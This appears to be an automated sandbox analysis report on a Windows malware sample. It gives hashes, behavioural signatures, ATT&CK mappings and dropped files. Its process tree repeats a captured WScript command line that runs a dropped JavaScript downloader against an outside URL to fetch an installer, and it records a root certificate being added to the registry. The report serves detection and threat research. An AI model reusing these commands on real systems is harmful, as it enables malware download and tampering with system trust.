af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db

Analysis

max time kernel
148s
max time network
179s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
04-12-2022 14:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe
Size

184KB
MD5

7a3ae85b5bc076b4c484e5223cdb43b7
SHA1

239fd8f151dde893baa1597a8b1394af2998abb0
SHA256

af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db
SHA512

5ec702074c30e8220b14c14e13f10678e63e91b8532c177b5ea1fe75e7de08ae7bdd61a284d7d287180a95724c99d313fde07502dc08226291b83d01d3b17894
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3R:/7BSH8zUB+nGESaaRvoB7FJNndnI

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 15 IoCs

flow	pid	Process
2	1544	WScript.exe
5	1544	WScript.exe
7	896	WScript.exe
11	896	WScript.exe
12	688	WScript.exe
14	688	WScript.exe
16	688	WScript.exe
18	688	WScript.exe
20	688	WScript.exe
21	288	WScript.exe
23	288	WScript.exe
25	288	WScript.exe
26	288	WScript.exe
29	1748	WScript.exe
31	1748	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 2 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 1544	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	27
PID 1888 wrote to memory of 1544	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	27
PID 1888 wrote to memory of 1544	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	27
PID 1888 wrote to memory of 1544	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	27
PID 1888 wrote to memory of 896	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	30
PID 1888 wrote to memory of 896	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	30
PID 1888 wrote to memory of 896	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	30
PID 1888 wrote to memory of 896	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	30
PID 1888 wrote to memory of 688	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	32
PID 1888 wrote to memory of 688	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	32
PID 1888 wrote to memory of 688	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	32
PID 1888 wrote to memory of 688	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	32
PID 1888 wrote to memory of 288	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	34
PID 1888 wrote to memory of 288	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	34
PID 1888 wrote to memory of 288	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	34
PID 1888 wrote to memory of 288	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	34
PID 1888 wrote to memory of 1748	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	36
PID 1888 wrote to memory of 1748	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	36
PID 1888 wrote to memory of 1748	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	36
PID 1888 wrote to memory of 1748	1888	af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe	36

C:\Users\Admin\AppData\Local\Temp\af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe
"C:\Users\Admin\AppData\Local\Temp\af08cd44cb18bbc961705c1603d63582a4ff5895e8a5a05d0e31dfdb860734db.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf69EB.js" http://www.djapp.info/?domain=JtEWYNIGxP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf69EB.exe
  2⤵
  - Blocklisted process makes network request
  PID:1544
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf69EB.js" http://www.djapp.info/?domain=JtEWYNIGxP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf69EB.exe
  2⤵
  - Blocklisted process makes network request
  PID:896
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf69EB.js" http://www.djapp.info/?domain=JtEWYNIGxP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf69EB.exe
  2⤵
  - Blocklisted process makes network request
  - Modifies system certificate store
  PID:688
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf69EB.js" http://www.djapp.info/?domain=JtEWYNIGxP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf69EB.exe
  2⤵
  - Blocklisted process makes network request
  PID:288
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf69EB.js" http://www.djapp.info/?domain=JtEWYNIGxP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxGLK81QpOOhYakyyZenuW16ANxPXHCs C:\Users\Admin\AppData\Local\Temp\fuf69EB.exe
  2⤵
  - Blocklisted process makes network request
  PID:1748

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
a4feaf11ab2269212883b999a17c7231

SHA1
73c157251f256fb9764366c49afd47fb55f466e1

SHA256
70740b40b5705b771ceb8a6229e49882aad320363388a0a44f38bacf502cdc81

SHA512
93a285cfadf4ea47a83f6130d72f4c3ab9da56911774601469211d403e5239c498d6855bc4362534289ae895ebf095bdfe4c24d1d327d0acfb01009756a21f47

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
280B

MD5
986eda6a044d40b54bc41dfac0bfed2b

SHA1
d7928d9714ff509a0ba1f101be7307b01b785867

SHA256
ecaa7e6680e036e4538113e4a83faff190440faf053328406e0f2f8ad3458944

SHA512
b2d071d3e3ef9527b554d30bbadd2c5231fe60bec26aa2dbb30b9e8c32db982e756c570910755af85d1435193ad3af2f9131a59a71f345992d53a4c8948120a2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
438B

MD5
01c61fe85e0242714c2b808961182689

SHA1
6c6422f30ce63cc373617775a8e026870e739e4e

SHA256
382700a471c39c4beb3fc36bbe88321f0fddf0f74e962d66cdc1053f9626fbfa

SHA512
66ae6c4f72d1973a790f21c769723edacbcd9aeba7819e63c3ddd56e690c04b2f620e58dd71e0feeb47d40c5dd7d28a48f948d3a8f19e1f62043a300a73c716f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
340B

MD5
ace5fe48cc4ba58452754b455b42ef8b

SHA1
17fee55787ad4981e5602524072c845667ae6d44

SHA256
2cfc0cd251ded2a9d14bde5c2b25c813d2aaada44e5b598d0dd1573213969014

SHA512
718669f57e1bc4d9c0e9200810bdd7d3fdac610420dcac865f4171bfaf197e8dfbd8e446ea759cf1c0dcf72ba7cde0f3cdb41e2752a55a1ec712ca225b33a17a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
426B

MD5
47cb6c5f10a8c61fb2e1b6fe71d25ae4

SHA1
a4191fc5fc8f867c04b91c6634e3b320806d2dfe

SHA256
681d82b44fceb65b9fdaeb926ced1019919f0e2be9da68a100462fdf254ec5b9

SHA512
1b0b2f304a3b7c80a6ef32f87019fbada896210c514f0609f77035a5c5c737d26709c6438c41b4a0facefa4da650b8fcd98a3546911a561c3cbbab7de723f6a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BG9XQTG0\domain_profile[1].htm

Filesize
43KB

MD5
97fad8238a1b1a121a0088e59fd5da1f

SHA1
73743b4f6091ab2a54ea4d3852b858b3fb1854a1

SHA256
1b4d773eabb47749db5831043f473fa1827d737a941ffe933f1057f2a8278576

SHA512
ff2f6f9d127530bb302e36a301130b2c2f958e63dcf4927a39eaac92c712d8e8d4c5e121d14856300ebf7fcc4ad829b733f0a34ce13c2eb11e46b4c404ef333e

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf69EB.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\9DPK80MW.txt

Filesize
99B

MD5
2b545444b683511c230bc8f8d459e843

SHA1
5189b11302e95aeef6f239f9ef07f36f02e7e935

SHA256
10a23824010b996af1fc9d0f71af8e6b986fb008d0c097902e51fe5862a7bf10

SHA512
365a9ffb3ba97dcb5de959f579a7250831553d97e3f35326f4bc91be4fa9ac2ecb40b1f02731ea155475155e38228c963eb9dccd25c3409f0e9b41b76b7db3df

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IUIGA91S.txt

Filesize
173B

MD5
04a888ca1da58ff8b4da83ba5b5a71c0

SHA1
0fd9f1f875bf4c7b2e34743abbd34b0e961e3955

SHA256
4f9de183c27b3618458f1e6a77f30191d2554647cc95ba7d9f726ed27d9a00d8

SHA512
c3fa47890dac47a0c61e6888b8ea53bb3d7b2dc27dc557cf001d041f5de5a8d7aaef9c51d4eec6dc7c33516f7f7a12a43f38b899cabecfea0fb5471032cf783f

Download Submit
memory/1888-54-0x00000000764D1000-0x00000000764D3000-memory.dmp

Filesize
8KB

Download